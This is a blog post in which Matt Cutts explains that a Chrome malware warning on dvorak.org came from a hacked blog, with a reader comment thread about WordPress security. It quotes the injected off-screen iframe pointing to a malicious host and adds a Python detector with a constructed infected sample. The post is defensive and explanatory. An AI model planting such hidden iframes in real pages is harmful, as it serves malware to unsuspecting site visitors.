Malware warning

Recently someone on Twitter complained that Chrome was labeling their site as malware:

http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.

I took a few minutes to compose a reply, so I’ll go ahead and post it here:

Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.

At the top of the page, the malicious iframe looks like this:

    <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class="rrfhezo"><iframe src="hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js" width="420" height="475"></iframe>

I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.

We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/

Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.

Hope that helps,
Matt Cutts

I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.
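
The injection quoted in the reply above hides an iframe by placing its container far off-screen with CSS. As an added example (not part of the original post or any Google tooling), this sketch flags third-party iframes nested in off-screen containers; it also checks inline `style` attributes, and the sample hostnames are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")          # .class { declarations }
OFFSCREEN = re.compile(r"\b(?:left|top)\s*:\s*-\d{3,}px", re.I)

def is_offscreen(css):
    """True for declarations like 'position:absolute; left:-1012px'."""
    return "absolute" in css.lower() and bool(OFFSCREEN.search(css))

class _Finder(HTMLParser):
    def __init__(self, site_host, hidden_classes):
        super().__init__()
        self.site_host, self.hidden = site_host, hidden_classes
        self.stack = []      # one flag per open <div>: is it off-screen?
        self.findings = []   # src of each suspicious iframe

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            classes = set((a.get("class") or "").split())
            self.stack.append(bool(classes & self.hidden)
                              or is_offscreen(a.get("style") or ""))
        elif tag == "iframe" and any(self.stack):
            host = urlparse(a.get("src") or "").hostname or ""
            if host and host != self.site_host:   # ignore same-site frames
                self.findings.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "div" and self.stack:
            self.stack.pop()

def find_hidden_iframes(html, site_host):
    """Return the src of every off-site iframe inside an off-screen <div>."""
    hidden = {name for name, body in RULE.findall(html) if is_offscreen(body)}
    finder = _Finder(site_host, hidden)
    finder.feed(html)
    return finder.findings

# Constructed sample modelled on the snippet quoted in the post.
INFECTED = ('<style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style>'
            '<div class="rrfhezo"><iframe src="http://injected.example/jquery/get.php'
            '?ver=jquery.latest.js" width="420" height="475"></iframe></div><p>Post</p>')
CLEAN = '<div class="video"><iframe src="https://video.example/embed/1"></iframe></div>'

if __name__ == "__main__":
    print(find_hidden_iframes(INFECTED, "blog.example"))
    print(find_hidden_iframes(CLEAN, "blog.example"))
```

Run it against the HTML your server actually returns, including error pages, since the injection described above appeared there too.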

14 Responses to Malware warning

  1. I have difficulty understanding the reason for hacks. Is it purely to inject links, is it for acclaim or some other reason?

    • It can be to inject links in order to promote another url, or in this case, to add malware directly to the server’s pages and spread the infection to anyone that visits a page.

      • Thanks for the reply. Yes, I guess that malware infections are now spread this way more often than email. This type of infection could I suspect include a trojan and open your computer to zombie control, keyloggers and all sorts of nasties. It’s unfortunate for the website concerned but Google are correct to protect their users.

  2. I’ve said this before and I’ll say it again…and Trend Micro has offered similar sentiments on this in the recent past, so I know I’m not alone. WordPress is an absolutely horrible, insecure platform, and even the latest version can be hacked, as Dvorak appears to be (it may not have been at the time, though…I don’t know).

    Having had multiple client WordPress sites hacked (I’ll avoid it like the bubonic plague now unless there is no other alternative), I can speak first-hand to Google’s awareness of the situation and how Webmaster Tools will inform the website owner of exactly what the hack is, where it came from, and what it links to. So it’s not like it’s speculative on big G’s part…they have reason to know.

    The only complaint I have about big G, and it’s not a complaint as much as it is a sheer nitpick, is that they don’t give even general advice to people on how to fix a situation like this. It would probably save a whole lot of time and grief if big G put up pages that said, “My WordPress site is hacked…what should I do?” Step 1: change any and all passwords. Step 2: update to the latest version. Step 3: make sure server is up to date. And so on and so on.

    I did find it funny that the Dvorak guy put his tinfoil hat on but was defending against the wrong person, though. Don’t assume SEO parasites are out to get you…assume Google is.

    I love the domain that hacked him, too. Organic crap. I hate that machine-produced factory-processed kind.

    • We can all find reasons to beat up on WordPress but most WordPress sites don’t get hacked. Keeping the hackers off your server is 40% of the battle. Keeping your WordPress installations up-to-date is another 45% of the battle. The remaining 15% of the battle comes down to diligence — and that’s just like with any other platform. They can all be hacked. Anyone who believes otherwise is a train wreck waiting to happen.

      • Yes, any site is hackable. Any software is, and any script is. That’s the nature of security…true security doesn’t exist. No one suggested otherwise.

        The problem with WordPress is in that 45%…you actually have to spend time downloading updates whenever WP releases them. You have to download plugin updates whenever they’re released. If your theme uses something like WooThemes, that needs to be updated. That takes time that doesn’t need to be taken. If a site is built in a half-decent manner in the first place, it can run for years without requiring constant, or if you really get it down pat any, updates. That’s a significant difference.

        It’s also why big G can accurately report on a hack attempt…a large enough volume of sites are affected that a pattern can clearly be determined. In order for that to happen, there has to be some common thread connecting all of these sites. Whether “most sites” aren’t hacked is immaterial…the relevant factors are the size of the hack attempt, its potential impact, and the source of the problem. In this case, it’s WordPress.

        Big G isn’t alone here, either. Again, Trend Micro has been saying this for years and the empirical evidence is there for anyone to see.

  3. EDIT: what I meant to say was that they don’t link to the general advice on hacking, not that they don’t have a hacked page. I knew about the hacked section, but I meant that in the times I’ve seen sites hacked, it wasn’t tied to WMT.

  4. Funny this guy thinks it is because “after I wrote negative commentary about Google”.

    I would have thought that unlikely, as negative comments about Google are hardly going to get a site blocked by Google. I am sure there are plenty og Gogle bashing pages around which would attest to this.

    I am fairly sure this iframe hacking thing is similar to what I found in someone’s site who has been in business over 30 years and last year lost all his ranked search results.

    It can be quite difficult to get people to keep their sites updated though.

    What advice would you give to website owners who never really login to any Google webmaster things to check warnings and who work full time on their offline things but need websites online to bring in business but have very limited understanding of such things Matt?

    I know a few people who rarely check in on anything RE their sites, and I mean it can be months between paying any attention to such things.

  5. Plenty of Google bashing pages as well as “og Gogle bashing pages” too 🙂

  6. Strange thing I learned from these issues is that it doesn’t matter if you run a static html site or a php site with database even if it runs the newest version. Everyone is hackable. Most of the time they edit files with their piece of code and even manage to upload some files. They get access through ftp or holes caused by badly coded scripts or even server issues. Always have a clean backup (saves you a lot of time instead of checking for infected files or database) to upload so that you can delete everything on your server and change all of your passwords.

  7. Hello Matt,

    This is an excellent write up and Google is doing a great job trying to help people.

    When people are hacked it is human nature to want to blame someone, often the messenger.

    Google has made great videos about how this happens, and what to do to fix it.

    I know I can be very critical of Google, however I would like you to see that I can also compliment and praise Google when Google does fantastic work like the hacked site videos Google has made to help people.

  8. Hello Rob,

    You make a misleading statement:

    >Strange thing I learned from these issues is that it doesn’t matter if you run a static html site or a php site with database even if it runs the newest version. Everyone is hackable.

    The above is true, however if you have a static HTML site your chances of being hacked are much less. Many times less chance of being hacked …

    Since we switched to static HTML sites several years ago, we have not been hacked. When we used WordPress we were being hacked all the time, many times a year, even if you update WordPress often.
    I also try to steer people away from using WordPress because of all the hacker issues and problems.

    • WordPress is a common platform so hacking it reaps much more reward than hacking a static html site. Typically static sites are not web 2.0 and allow little interaction with the user, therefore XSS doesn’t come into play. But WordPress is a powerful and simple method of creating a blog and can be kept secure. I mean this very blog is WordPress remember.

    • @Tom You’re right, it’s a bit misleading. Static HTML is secure. I just want to say that no one is safe. With static HTML they have to use other holes in your security (server related or through ftp).
